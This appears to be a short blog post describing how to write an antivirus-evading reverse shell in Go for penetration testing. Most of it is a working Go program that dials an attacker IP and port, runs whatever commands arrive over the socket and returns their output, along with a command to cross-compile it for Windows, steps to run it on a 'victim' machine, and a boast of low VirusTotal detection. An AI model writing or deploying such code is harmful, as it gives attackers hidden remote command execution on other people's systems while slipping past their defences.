Undetectable Reverse shell with golang

Go to the profile of Sathish Kumar
Sathish Kumar

I was exploring different methods to evade AV engines which will be helpful during Pen-testing Engagements. Since most of the malware's are written on C#, C++ and python(Because it supports cross-platform).Most of the PowerShell and DDE injection methods were detected with AV solution so I taught of giving a try with golang because Go has many features such as concurrency and also its compiled to machine code so it has good performance.

Getting Started

All we need is to write a simple script to connect to the network port and read the input from the network port and execute the command and redirect the stdout and stderr to the same network socket.

package main

import (
   "bufio"
   "fmt"
   "net"
   "os/exec"
   "strings"
)

func main() {
   conn, _ := net.Dial("tcp", "10.1.75.200:8081")
   for {

      message, _ := bufio.NewReader(conn).ReadString('\n')

      out, err := exec.Command(strings.TrimSuffix(message, "\n")).Output()

      if err != nil {
         fmt.Fprintf(conn, "%s\n",err)
      }

      fmt.Fprintf(conn, "%s\n",out)

   }
}

Source:

https://github.com/sathish09/rev2go

We can build the go file to any format by specifying the os and architecture.

env GOOS=windows GOARCH=386 go build hello.go

Start the listener in the attacker box and transfer the file to the victim machine and run it.

Windows Defender Scan Results

We will get a reverse connection once the victim runs the executable.

Reverse Connection

AV Scan Results:

Hybrid Analysis
Virus total Results
VirusTotal
Edit descriptionwww.virustotal.com

So What’s next ?

Implement encryption and memory protection. Make it more interactive.. Build a post-exploitation framework and what not.. Go is awesome 😉